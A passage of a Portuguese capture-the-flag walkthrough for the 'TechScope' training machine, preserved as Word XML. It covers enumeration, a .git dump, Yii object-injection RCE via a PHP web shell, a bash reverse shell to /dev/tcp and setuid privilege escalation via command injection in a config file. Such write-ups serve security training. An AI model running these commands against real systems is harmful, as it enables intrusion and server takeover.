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TechScope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Vamos começar realizando a enumeração dos hosts-alvo,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as portas abertas e os serviços expostos.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&lt;MACHINE-IP&gt;-sVC -vvv</w:t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784"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="4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7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duas portas abertas,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Ao realizar uma requisição com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serviço web, foi observado um redirecionamento para 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techscope.hc,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indicando a presença de um virtual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(vhost)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configurado na aplicação.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06128"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="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1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garantir a resolução local do domínio identificado, foi adicionada uma entrada correspondente no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/etc/hosts,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associando o endereço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máquina alvo ao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techscope.hc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02445"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="4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4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web foi acessada por meio da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(HTTP),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a interação inicial com a interface exposta pelo serviço.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46563"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="5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enumeração de diretórios e arquivos na aplicação web utilizando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ffuf,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 meio de técnicas de brute force para identificar recursos ocultos ou não documentados.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//techscope.hc/FUZZ -w big.txt -c -t 100 -fw 6148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100"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="5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enumeração da aplicação web, foi identificado um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.git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exposto. A presença desse diretório indica que o repositório de controle de versão da aplicação está acessível publicamente, o que pode permitir a extração do código-fonte, histórico de commits e possíveis informações sensíveis.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ferramenta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git-dumper</w:t>
        </w:r>
      </w:hyperlink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,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realizar o download completo dos arquivos do repositório exposto, permitindo a reconstrução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 a partir do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git_dumper.py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//techscope.hc/.git dumper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94868"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="5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86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75263"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="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2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dos arquivos obtidos, foi identificado,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SiteController.php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contém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actionPaymentWebhook.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função está relacionada ao processamento de requisições ligadas a pagamentos dentro da aplicação.</w:t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87700"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="5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actionPaymentWebhook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 dados controlados pelo usuário para instanciar objetos dinamicamente através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Yii::createObject.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parâmetro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handler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define a classe a ser carregada, enquanto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options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permite a injeção de propriedades arbitrárias durante a criação do objeto.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comportamento permite que um atacante forneça classes internas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Yii Framework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junto com parâmetros manipulados, influenciando diretamente o funcionamento interno da aplicação.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000032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8wkee089c4e0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dessa vulnerabilidade, é possível injetar um objeto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JSON malicioso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que, ao ser processado pela aplicação, resulta na escrita de arquivos no diretório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vhost /var/www/techscope/web.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controlar o conteúdo desse arquivo, o atacante pode inserir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arbitrário.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Isso permite a execução de comandos no sistema por meio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 do PHP,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caracterizando uma execução remota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 (RCE)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impacto direto no servidor.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X-Service-Token: sh0p_webhook_secret</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000038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Token: &lt;?php system($_GET[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 ?&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000039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"handler"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"yii\\log\\Dispatcher"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F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41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043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"yii\\log\\FileTarget"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"/var/www/techscope/web/test1.php"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"levels"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"warning"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4B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]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004D">
      <w:pPr>
        <w:spacing w:after="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51200"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="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retornou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status code 200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acompanhado de uma resposta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indicando que a requisição foi processada com sucesso e que o arquivo foi criado no sistema.</w:t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//techscope.hc/test1.php?0=ls%20-alh</w:t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92300"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="5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estabelecida uma conexão reversa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o controle remoto do servidor comprometido.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/bin/bash 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 -i &gt;&amp; /dev/tcp/&lt;VPN-IP&gt;/443 0&gt;&amp;1"</w:t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30400"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="5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conexão reversa foi estabelecida com sucesso e recebida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interação remota com o sistema comprometido.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005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 /dev/null -c bash</w:t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ctr+z</w:t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stty raw -echo;fg</w:t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84400"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="2540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 se encontra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/.</w:t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qwfc0udguwtr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analisar os processos em execução na máquina alvo, foi transferido um binário chamado</w:t>
      </w:r>
      <w:hyperlink r:id="rId2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pspy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utilizado para monitorar processos em tempo real sem necessidade de privilégios elevados.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000006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python3 -m http.server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25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="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 &lt;VPN-IP&gt;/pspy64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62200"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="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execução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pspy,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que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/usr/bin/healthcheck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executado periodicamente por uma tarefa cron com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privilégios de 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sistema Linux.</w:t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79500"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="6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permitir uma análise mais detalhada,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/usr/bin/healthcheck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transferido da máquina alvo para o ambiente local.</w:t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/usr/bin/healthcheck &gt; /dev/tcp/&lt;VPN-IP&gt;/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443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"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="6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nc -lvnp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443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healthcheck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30300"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="6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foi analisado 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Ghidra,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a inspeção de sua lógica interna e comportamento.</w:t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800"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="6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7000"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="4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análise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revelou duas falhas críticas: leitura de um arquivo de configuração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/dev/shm/check.conf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permissão de escrita global e uso inseguro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dados não sanitizados.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Isso permite injetar comandos que serão executados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possibilitando a escalada de privilégios, como a adição do bit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bash.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'http://localhost; chmod +s /bin/bash #'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/dev/shm/check.conf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90600"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="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4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36800"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="4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36" w:type="default"/>
      <w:headerReference r:id="rId37" w:type="first"/>
      <w:headerReference r:id="rId38" w:type="even"/>
      <w:footerReference r:id="rId39" w:type="default"/>
      <w:footerReference r:id="rId40" w:type="first"/>
      <w:footerReference r:id="rId41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rPr>
        <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
      </w:rPr>
    </w:pPr>
    <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.6vrogorm36q9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8" name="image18.jpg"/>
          <a:graphic>
            <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
              <pic:pic>
                <pic:nvPicPr>
                  <pic:cNvPr id="0" name="image18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65" name="image23.png"/>
          <a:graphic>
            <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
              <pic:pic>
                <pic:nvPicPr>
                  <pic:cNvPr id="0" name="image2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4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Tech Scope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4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16.png"/><Relationship Id="rId41" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer3.xml"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image5.png"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image9.png"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/dominicbreuker/pspy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4.png"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image2.png"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image26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5.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://app.hackingclub.com/training/training-machines/307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4.png"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image27.png"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image21.png"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image10.png"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image13.png"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image20.png"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image8.png"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image3.png"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image12.png"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image17.png"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/arthaud/git-dumper" TargetMode="External"/><Relationship Id="rId37" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header2.xml"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/arthaud/git-dumper" TargetMode="External"/><Relationship Id="rId36" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header1.xml"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image4.png"/><Relationship Id="rId39" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer1.xml"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image22.png"/><Relationship Id="rId38" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header3.xml"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image6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IF0B80leFuRxrI1ap0P19ojcg==">CgMxLjAyDmgud3FpbXA1NmM2ODd0Mg5oLnFzdzh1dmttd2MydjIOaC5sZzBzM2E1OXRzeHMyDmguOHdrZWUwODljNGUwMg5oLnF3ZmMwdWRndXd0cjIOaC42dnJvZ29ybTM2cTk4AHIhMXBaY1dxX0N6aEhuOVJHOEFvOV83dGxQNjQ1M0JPS0pk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